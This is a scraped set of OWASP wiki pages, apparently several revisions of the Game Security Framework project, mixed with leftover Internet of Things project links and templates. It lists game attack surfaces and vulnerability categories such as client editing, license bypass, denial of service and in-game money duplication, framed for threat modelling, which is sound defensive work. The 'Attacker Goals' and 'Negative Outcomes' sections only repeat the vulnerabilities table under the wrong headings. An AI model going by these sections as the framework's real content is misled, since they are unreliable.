A project focused on helping small business connect with security researchers to aid in securing their IoT-based products before going market.

Their goals include:
* Focus effort towards small business
* Build partnerships
* Coordinate efforts
* Curate informational resources
* Present research

[https://otalliance.org Online Trust Alliance]

Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501c3 charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is global organization supported by over 100 organizations headquartered in Bellevue, Washington with offices in Washington DC.

Addressing the mounting concerns, in January 2015 the Online Trust Alliance, established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long- term supportability and transfers of ownership of devices and the data collected.

[https://allseenalliance.org/framework AllSeen Alliance]

The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer, manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, including many other lightweight real-time operating systems.

[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]

The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.

[http://securingsmartcities.org/ Securing Smart Cities]

Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.

===Talks===

RSA Conference San Francisco <br>
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br>
Daniel Miessler, Practice Principal <br>
April 21, 2015 <br>
--- <br>
Defcon 23 <br>
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br>
Daniel Miessler <br>
August 6-9, 2015

===Podcasts===

* [http://iotpodcast.com/ The Internet of Things Podcast]
* [http://www.iot-inc.com/ IoT Inc]
* [https://craigsmith.net/category/podcast/ IoT This Week]
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]

===IoT Conferences===

* [http://www.iotevents.org Internet of Things Events]

Conference Call for Papers
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]
|}

= Testing Tools =

== Commonly Used Game Hacking Tools ==

{{Social Media Links}}

=Project About=

{{Template:Project About
| project_name =OWASP Internet of Things Project
| project_description =
| project_license =CC-BY 3.0 for documentation and GPLv3 for code.
| leader_name1 = Daniel Miessler
| leader_email1 =
| leader_username1 =
| leader_name2 =Craig Smith
| leader_email2 =
| leader_username2 =
| contributor_name1 = Justin Klein Keane]
| contributor_email1 =
| contributor_username1 = Justin_C._Klein_Keane
| contributor_name2 = Yunsoul
| contributor_email2 =
| contributor_username2 = Yunsoul
| mailing_list_name =
| links_url1 =
| links_name1 =
}}

__NOTOC__ <headertabs></headertabs>

[[Category:OWASP_Project]]
[[Category:OWASP_Document]]
[[Category:OWASP_Download]]
[[Category:OWASP_Release_Quality_Document]]

OWASP Game Security Framework Project

2017-02-03T01:16:29Z

Jason Haddix: /* OWASP Game Security Framework (GSF) */

= About the Project =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

==OWASP Game Security Framework (GSF)==

'''The OWASP Game Security Framework (GSF) represents a modular approach to understanding the security issues that surround video game ecosystems.'''

In 2016 the videogame market became 99.6 Billion dollar industry... any why shouldn't it be? Some of the most prolific and complex software developed today are video games. They are professionally played, sponsored, scrutinized, monetized, and celebrated, just like many sports. They handle clients, servers, web components, monetary transfers, social interactions, virtual markets, etc, with every bit the need of security that most internet hosted apps have (if not more in some cases). The GSF is designed to help threat model gaming issues that have devastated new games. Most importantly we hope the GSF can help new developers and security testers alike root out bugs in your favorite titles.

''The framework is broken into three main concepts / sections:''

'''1. Identifying and clustering the components of risk within the overall game security space, and then giving instances of each component.'''

''Components include the following:''

* '''Attack Surfaces''': the various surface areas that can be attacked by attackers in order to cause harm to the gaming ecosystem.

* '''Vulnerabilities''': the specific weaknesses in design or implementation that allows attackers to successfully target a given game.

* '''Attacker Goals''': a list of the reasons that an attacker might want to attack a given game.

* '''Negative Outcomes''': a collection of ways that the gaming company could ultimately be impacted negatively by attacks to its game and associated infrastructure.

'''2. A natural language semantic structure for thinking about and articulating game security issues, which uses the modular risk components as sentence structure.'''

''Example:''

: "The attacker attacked and edited the <code>LOCAL GAME CLIENT (Attack Surface)</code>, which had a <code>LACK OF CLIENT INTEGRITY CONTROLS (Vulnerability)</code>, which allowed her to <code>ARTIFICIALLY INCREASE HER ABILITIES (Attacker Goal)</code>, ultimately leading to an <code>UNHAPPY PLAYER BASE (Negative Outcome)</code> and <code>DECLINING GAME REVENUE (Negative Outcome)</code> due to cheating.”

Using this structure, security testers can clearly communicate the various aspects of a game security issue to many different types of stakeholder—from pentesting peers to business executives in the gaming industry.

'''3. Examples of real-world examples of previous attacks against games, and how the attacks map to the GSF framework components.'''

==Licensing==
The OWASP Game Security Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.

== ==
{{Social Media Links}}

| valign="top" style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the OWASP Game Security Framework? ==

The goal of the OWASP Game Security Framework is to provide a structure for discussing the various aspects around the security of video games.

The target audience for the project includes:

* Gamers
* QA
* Game designers
* Penetration testers
* Gaming executives
* Anyone else with a vested interest in game security

== Project Leaders ==

* Jason Haddix
* Daniel Miessler

== Contributors ==
* LFG

== Related Projects ==

* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]

| valign="top" style="padding-left:25px;width:200px;" |

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Quick Download ==

COMING SOON

== News and Events ==
* ''[JANUARY 2017]'' Doing a complete redesign of the project.

==Classifications==

{| width="200" cellpadding="2"
|-
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]]
|-
| align="center" valign="top" width="50%"| [[File:Owasp-defenders-small.png|link=]]
|-
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]
|-
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]
|}

|}

= Game Attack Surfaces =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

== Game Security Attack Surfaces ==

The following is a list of the attack surfaces that can be found in video games of various types.

{| border="1" class="wikitable" style="text-align: left"
! Attack Surface
! Description
|-
| '''Local Game Client'''
|
* The locally running game client that is accessible to the gamer because it's running on his/her machine.
|-
| '''Game Network Traffic'''
|
* The network which game traffic traverses in order to reach the game's server or peers who are playing the game.
|-
| '''Game Server'''
|
* The game server that is hosting the instance that gamers connect to in order to play the game.
|-
| '''Game Economy'''
|
* The economic system that exists within the game.
|-
|}

== ==
{{Social Media Links}}

| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the Attack Surfaces Section? ==

This section provides an overview of the various places an attacker can target to harm a given game infrastructure.

== Project Leaders ==

* Daniel Miessler

== Related Projects ==

* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Quick Download ==
* Coming Soon

== News and Events ==
* Coming Soon

|}

= Game Vulnerabilities =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

== Game Security Vulnerabilities ==

The following is a list of the vulnerabilities that can be found in video games of various types, and the attack surfaces they're likely to be associated with.

{| border="1" class="wikitable" style="text-align: left"
! Attack Surface
! Vulnerability Name
|-
| '''Local Game Client'''
|
* Ability to edit in-game resources
* Ability to bypass license requirement
|-
| '''Game Network Traffic'''
|
* Network Denial of Service (player)
** Player bandwidth exhaustion
** Player game client resource exhaustion
|-
| '''Game Application Traffic'''
|
* Application Level Denial of Service (Player)
** Player application logic Denial of Service
|-
| '''Game Server'''
|
* Application Level Denial of Service (Server)
** Server application logic Denial of Service
* Ability to modify game ladder rankings
* Ability to modify own player resources
|-
| '''Game Economy'''
|
* Ability to generate unlimited money on client side
* Ability to generate unlimited money through network/application traffic modification
* Ability to modify prices for in-game items
* Ability to replay financial actions such as buying or selling through network/application manipulation
|-
|}

== ==
{{Social Media Links}}

| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the Game Security Vulnerabilities Project? ==

The Security Vulnerabilities Project provides information on what types of vulnerabilities exist within games, and which attack surfaces they fall under.

== Project Leaders ==

* Jason Haddix

== Related Projects ==

* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Resources ==
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]

== News and Events ==
* Coming Soon

|}

= Attacker Goals =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

== Game Security Vulnerabilities ==

The following is a list of the vulnerabilities that can be found in video games of various types, and the attack surfaces they're likely to be associated with.

{| border="1" class="wikitable" style="text-align: left"
! Attack Surface
! Description
|-
| '''Local Game Client'''
|
* Ability to edit in-game resources
* Ability to bypass license requirement
|-
| '''Game Network Traffic'''
|
* Network Denial of Service (player)
** Player bandwidth exhaustion
** Player game client resource exhaustion
|-
| '''Game Application Traffic'''
|
* Application Level Denial of Service (Player)
** Player application logic Denial of Service
|-
| '''Game Server'''
|
* Application Level Denial of Service (Server)
** Server application logic Denial of Service
* Ability to modify game ladder rankings
* Ability to modify own player resources
|-
| '''Game Economy'''
|
* Ability to generate unlimited money on client side
* Ability to generate unlimited money through network/application traffic modification
* Ability to modify prices for in-game items
* Ability to replay financial actions such as buying or selling through network/application manipulation
|-
|}

== ==
{{Social Media Links}}

| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the Game Security Vulnerabilities Project? ==

The Security Vulnerabilities Project provides information on what types of vulnerabilities exist within games, and which attack surfaces they fall under.

== Project Leaders ==

* Daniel Miessler

== Related Projects ==

* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Resources ==
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]

== News and Events ==
* Coming Soon

|}

= Negative Outcomes =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

== Game Security Vulnerabilities ==

The following is a list of the vulnerabilities that can be found in video games of various types, and the attack surfaces they're likely to be associated with.

{| border="1" class="wikitable" style="text-align: left"
! Attack Surface
! Description
|-
| '''Local Game Client'''
|
* Ability to edit in-game resources
* Ability to bypass license requirement
|-
| '''Game Network Traffic'''
|
* Network Denial of Service (player)
** Player bandwidth exhaustion
** Player game client resource exhaustion
|-
| '''Game Application Traffic'''
|
* Application Level Denial of Service (Player)
** Player application logic Denial of Service
|-
| '''Game Server'''
|
* Application Level Denial of Service (Server)
** Server application logic Denial of Service
* Ability to modify game ladder rankings
* Ability to modify own player resources
|-
| '''Game Economy'''
|
* Ability to generate unlimited money on client side
* Ability to generate unlimited money through network/application traffic modification
* Ability to modify prices for in-game items
* Ability to replay financial actions such as buying or selling through network/application manipulation
|-
|}

== ==
{{Social Media Links}}

| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the Game Security Vulnerabilities Project? ==

The Security Vulnerabilities Project provides information on what types of vulnerabilities exist within games, and which attack surfaces they fall under.

== Project Leaders ==

* Daniel Miessler

== Related Projects ==

* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Resources ==
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]

== News and Events ==
* Coming Soon

|}

= Defenses =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

== Common Game Security Defenses ==

Table Here

== ==
{{Social Media Links}}

| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the Game Security Vulnerabilities Project? ==

The Security Vulnerabilities Project provides information on what types of vulnerabilities exist within games, and which attack surfaces they fall under.

== Project Leaders ==

* Daniel Miessler

== Related Projects ==

* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Resources ==
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]

== News and Events ==
* Coming Soon

|}
= Examples =

== Real-world Examples of Gaming Vulnerabilities==

''Vulnerability 1''

{| class="wikitable"
! style="font-weight: bold;" | Vulnerabilty Name
! style="font-weight: bold;" | Description
! style="font-weight: bold;" | Surface Area
! style="font-weight: bold;" | Attacker Goal
! style="font-weight: bold;" | Negative Outcome
! style="font-weight: bold;" | Tester Tool
! style="font-weight: bold;" | Defense
! Ref
! Genre
|-
| Local Resource Modification, Client-side Logic Flaw
| In 2015 The Division experienced an exploit that allowed an attacker to switch weapons rapidly, applying weapon buffs in a stacking manner, with no cap.
| Game Client
| Unfair Player Advantage
| Player Anger, Lost Revenue
| Game Client
| Cryptographic Integrity Checks on Game Client
| http://www.gamesradar.com/theres-a-division-damage-stacking-glitch-if-youve-got-fast-fingers/
| 3PS/1PS/MMO
|-
| colspan="9" style="text-align: center;" | The attacker attacked and edited the LOCAL GAME CLIENT (Attack Surface), which had a LACK OF CLIENT INTEGRITY CONTROLS (Vulnerability), which allowed her to ARTIFICIALLY INCREASE HER ABILITIES (Attacker Goal), ultimately leading to an UNHAPPY PLAYER BASE (Negative Outcome) and DECLINING GAME REVENUE (Negative Outcome) due to cheating.
|-
|
|
|
|
|
|
|
|
|
|}
''Template 1''

: "The attacker attacked and edited the <code>LOCAL GAME CLIENT (Attack Surface)</code>, which had a <code>LACK OF CLIENT INTEGRITY CONTROLS (Vulnerability)</code>, which allowed her to <code>ARTIFICIALLY INCREASE HER ABILITIES (Attacker Goal)</code>, ultimately leading to an <code>UNHAPPY PLAYER BASE (Negative Outcome)</code> and <code>DECLINING GAME REVENUE (Negative Outcome)</code> due to cheating.”

== ==
{{Social Media Links}}

= Community =

[https://www.iamthecavalry.org/ I Am The Cavalry]

A global grassroots organization that is focused on issues where computer security intersects public safety and human life.

Their areas of focus include:
* Medical devices
* Automobiles
* Home Electronics
* Public Infrastructure
== ==
[http://builditsecure.ly BuildItSecure.ly]

A project focused on helping small business connect with security researchers to aid in securing their IoT-based products before going market.

Their goals include:
* Focus effort towards small business
* Build partnerships
* Coordinate efforts
* Curate informational resources
* Present research
== ==
[https://otalliance.org Online Trust Alliance]

Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501c3 charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is global organization supported by over 100 organizations headquartered in Bellevue, Washington with offices in Washington DC.

Addressing the mounting concerns, in January 2015 the Online Trust Alliance, established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long- term supportability and transfers of ownership of devices and the data collected.
== ==
[https://allseenalliance.org/framework AllSeen Alliance]

The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer, manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, including many other lightweight real-time operating systems.
== ==
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]

The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.
== ==
[http://securingsmartcities.org/ Securing Smart Cities]

Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.

===Talks===

RSA Conference San Francisco <br>
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br>
Daniel Miessler, Practice Principal <br>
April 21, 2015 <br>
--- <br>
Defcon 23 <br>
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br>
Daniel Miessler <br>
August 6-9, 2015

===Podcasts===

* [http://iotpodcast.com/ The Internet of Things Podcast]
* [http://www.iot-inc.com/ IoT Inc]
* [https://craigsmith.net/category/podcast/ IoT This Week]
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]

===IoT Conferences===

* [http://www.iotevents.org Internet of Things Events]

Conference Call for Papers
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]
|}

= Testing Tools =

== Commonly Used Game Hacking Tools ==

== ==
{{Social Media Links}}

=Project About=

{{Template:Project About
| project_name =OWASP Internet of Things Project
| project_description =
| project_license =CC-BY 3.0 for documentation and GPLv3 for code.
| leader_name1 = Daniel Miessler
| leader_email1 =
| leader_username1 =
| leader_name2 =Craig Smith
| leader_email2 =
| leader_username2 =
| contributor_name1 = Justin Klein Keane]
| contributor_email1 =
| contributor_username1 = Justin_C._Klein_Keane
| contributor_name2 = Yunsoul
| contributor_email2 =
| contributor_username2 = Yunsoul
| mailing_list_name =
| links_url1 =
| links_name1 =
| links_url1 =
| links_name1 =
}}

__NOTOC__ <headertabs />

[[Category:OWASP_Project]] [[Category:OWASP_Document]] [[Category:OWASP_Download]] [[Category:OWASP_Release_Quality_Document]]

OWASP Game Security Framework Project

2017-01-18T02:48:14Z

Jason Haddix:

= About the Project =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

==OWASP Game Security Framework (GSF)==

'''The OWASP Game Security Framework (GSF) represents a modular approach to understanding the security issues that surround video game ecosystems.'''

''The framework is broken into three main concepts / sections:''

'''1. Identifying and clustering the components of risk within the overall game security space, and then giving instances of each component.'''

''Components include the following:''

* '''Attack Surfaces''': the various surface areas that can be attacked by attackers in order to cause harm to the gaming ecosystem.

* '''Vulnerabilities''': the specific weaknesses in design or implementation that allows attackers to successfully target a given game.

* '''Attacker Goals''': a list of the reasons that an attacker might want to attack a given game.

* '''Negative Outcomes''': a collection of ways that the gaming company could ultimately be impacted negatively by attacks to its game and associated infrastructure.

'''2. A natural language semantic structure for thinking about and articulating game security issues, which uses the modular risk components as sentence structure.'''

''Example:''

: "The attacker attacked and edited the <code>LOCAL GAME CLIENT (Attack Surface)</code>, which had a <code>LACK OF CLIENT INTEGRITY CONTROLS (Vulnerability)</code>, which allowed her to <code>ARTIFICIALLY INCREASE HER ABILITIES (Attacker Goal)</code>, ultimately leading to an <code>UNHAPPY PLAYER BASE (Negative Outcome)</code> and <code>DECLINING GAME REVENUE (Negative Outcome)</code> due to cheating.”

Using this structure, security testers can clearly communicate the various aspects of a game security issue to many different types of stakeholder—from pentesting peers to business executives in the gaming industry.

'''3. Examples of real-world examples of previous attacks against games, and how the attacks map to the GSF framework components.'''

==Licensing==
The OWASP Game Security Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.

== ==
{{Social Media Links}}

| valign="top" style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the OWASP Game Security Framework? ==

The goal of the OWASP Game Security Framework is to provide a structure for discussing the various aspects around the security of video games.

The target audience for the project includes:

* Gamers
* QA
* Game designers
* Penetration testers
* Gaming executives
* Anyone else with a vested interest in game security

== Project Leaders ==

* Jason Haddix
* Daniel Miessler

== Contributors ==
* LFG

== Related Projects ==

* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]

| valign="top" style="padding-left:25px;width:200px;" |

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Quick Download ==

COMING SOON

== News and Events ==
* ''[JANUARY 2017]'' Doing a complete redesign of the project.

==Classifications==

{| width="200" cellpadding="2"
|-
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]]
|-
| align="center" valign="top" width="50%"| [[File:Owasp-defenders-small.png|link=]]
|-
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]
|-
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]
|}

|}

= Game Attack Surfaces =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

== Game Security Attack Surfaces ==

The following is a list of the attack surfaces that can be found in video games of various types.

{| border="1" class="wikitable" style="text-align: left"
! Attack Surface
! Description
|-
| '''Local Game Client'''
|
* The locally running game client that is accessible to the gamer because it's running on his/her machine.
|-
| '''Game Network Traffic'''
|
* The network which game traffic traverses in order to reach the game's server or peers who are playing the game.
|-
| '''Game Server'''
|
* The game server that is hosting the instance that gamers connect to in order to play the game.
|-
| '''Game Economy'''
|
* The economic system that exists within the game.
|-
|}

== ==
{{Social Media Links}}

| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the Attack Surfaces Section? ==

This section provides an overview of the various places an attacker can target to harm a given game infrastructure.

== Project Leaders ==

* Daniel Miessler

== Related Projects ==

* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Quick Download ==
* Coming Soon

== News and Events ==
* Coming Soon

|}

= Game Vulnerabilities =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

== Game Security Vulnerabilities ==

The following is a list of the vulnerabilities that can be found in video games of various types, and the attack surfaces they're likely to be associated with.

{| border="1" class="wikitable" style="text-align: left"
! Attack Surface
! Vulnerability Name
|-
| '''Local Game Client'''
|
* Ability to edit in-game resources
* Ability to bypass license requirement
|-
| '''Game Network Traffic'''
|
* Network Denial of Service (player)
** Player bandwidth exhaustion
** Player game client resource exhaustion
|-
| '''Game Application Traffic'''
|
* Application Level Denial of Service (Player)
** Player application logic Denial of Service
|-
| '''Game Server'''
|
* Application Level Denial of Service (Server)
** Server application logic Denial of Service
* Ability to modify game ladder rankings
* Ability to modify own player resources
|-
| '''Game Economy'''
|
* Ability to generate unlimited money on client side
* Ability to generate unlimited money through network/application traffic modification
* Ability to modify prices for in-game items
* Ability to replay financial actions such as buying or selling through network/application manipulation
|-
|}

== ==
{{Social Media Links}}

| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the Game Security Vulnerabilities Project? ==

The Security Vulnerabilities Project provides information on what types of vulnerabilities exist within games, and which attack surfaces they fall under.

== Project Leaders ==

* Jason Haddix

== Related Projects ==

* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Resources ==
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]

== News and Events ==
* Coming Soon

|}

= Attacker Goals =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

== Game Security Vulnerabilities ==

The following is a list of the vulnerabilities that can be found in video games of various types, and the attack surfaces they're likely to be associated with.

{| border="1" class="wikitable" style="text-align: left"
! Attack Surface
! Description
|-
| '''Local Game Client'''
|
* Ability to edit in-game resources
* Ability to bypass license requirement
|-
| '''Game Network Traffic'''
|
* Network Denial of Service (player)
** Player bandwidth exhaustion
** Player game client resource exhaustion
|-
| '''Game Application Traffic'''
|
* Application Level Denial of Service (Player)
** Player application logic Denial of Service
|-
| '''Game Server'''
|
* Application Level Denial of Service (Server)
** Server application logic Denial of Service
* Ability to modify game ladder rankings
* Ability to modify own player resources
|-
| '''Game Economy'''
|
* Ability to generate unlimited money on client side
* Ability to generate unlimited money through network/application traffic modification
* Ability to modify prices for in-game items
* Ability to replay financial actions such as buying or selling through network/application manipulation
|-
|}

== ==
{{Social Media Links}}

| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |

== What is the Game Security Vulnerabilities Project? ==

The Security Vulnerabilities Project provides information on what types of vulnerabilities exist within games, and which attack surfaces they fall under.

== Project Leaders ==

* Daniel Miessler

== Related Projects ==

* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]

== Collaboration ==
[https://game-security.slack.com The Slack Channel]

== Resources ==
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]

== News and Events ==
* Coming Soon

|}

= Negative Outcomes =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

== Game Security Vulnerabilities ==

The following is a list of the vulnerabilities that can be found in video games of various types, and the attack surfaces they're likely to be associated with.

{| border="1" class="wikitable" style="text-align: left"
! Attack Surface
! Description
|-
| '''Local Game Client'''
|
* Ability to edit in-game resources
* Ability to bypass license requirement
|-
| '''Game Network Traffic'''
|
* Network Denial of Service (player)
** Player bandwidth exhaustion
** Player game client resource exhaustion
|-
| '''Game Application Traffic'''
|
* Application Level Denial of Service (Player)
** Player application logic Denial of Service
|-
| '''Game Server'''
|
* Application Level Denial of Service (Server)
** Server application logic Denial of Service
* Ability to modify game ladder rankings
* Ability to modify own player resources
|-
| '''Game Economy'''
|
* Ability to generate unlimited money on client side
* Ability to generate unlimited money through network/application traffic modification
